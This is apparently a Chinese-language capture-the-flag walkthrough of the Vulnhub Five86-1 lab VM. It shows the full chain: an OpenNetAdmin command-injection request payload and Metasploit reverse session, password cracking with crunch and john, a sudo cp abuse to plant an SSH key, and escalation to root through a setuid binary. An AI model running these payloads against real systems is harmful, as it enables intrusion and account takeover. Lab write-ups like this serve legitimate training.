Vulnhub-Five86-1
實驗環境
kali攻擊機ip:192.168.56.116
Five86-1靶機ip:192.168.56.121
知識點及工具
nmap掃描
john爆破
OpenNetAdmin RCE
開始滲透
首先第一步對目標靶機網絡
nmap -A –p- 192.168.56.121
掃描發現一個80web端口和一個22ssh端口和10000webmin端口。
Web瀏覽 http://192.168.56.121,頁面啥都沒有空白一片
使用dirb工具對目錄進行掃描,或者namp掃描也有提示robots.txt和/ona目錄
訪問/ona
http://192.168.56.121/ona
發現是opennetadmin,exploit-db搜索找到兩個poc一個msf的一個sh
先拿sh的文件驗證一下,抓取登錄包,修改請求方式為post,body添加以下代碼
xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping
發現可利用,執行成功了
腳本運行一下
./exp.sh http://192.168.56.121/ona/login.php
或者利用msf的也行,把它復制到/usr/share/metasploit-framework/modules/exploits目錄下,然后重新加載msf(命令reload_all)。
set rhosts 192.168.56.121 set lhost 192.168.56.116 exploit
在此發現限制了其他目錄訪問,可ls,cat 等命令
然后查找一下www-data能夠訪問的東西
find / -type f -user www-data
在前面兩個可以看到能夠讀取.htaccess文件
cat /var/www/html/reports/.htaccess
看到了douglas賬號密碼,然后提示aefhrt組合的10個字符
接下來生成密碼
crunch 10 10 aefhrt > password.txt
爆破密碼
john --wordlist=password.txt douglas
爆破出來得到密碼
douglas:fatherrrrr
ssh登錄
ssh douglas@192.168.56.121
找了一番 然后sudo –l 發現可cp,然后進行下一步
生成一個jen的ssh密鑰吧,看見douglas下存在.ssh,也給jen生成一個
ssh-keygen –t rsa –C “jen@five86-1”
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
這個就利用了cp命令
切換一個身份
ssh jen@127.0.0.1
登錄成功了
登錄之后我看見了最后一行提示了你有一封新郵件,然后查看,發現了moss的賬號密碼
cd /var/maills
cat jen
得到賬號密碼
moss:Fire!Fire!
再次切換為moss用戶
su moss
在moss目錄下發現一個.games目錄下upyougame運行可root身份
隨便你怎么輸入只要輸入個字符,然后完了就是#(root)號了
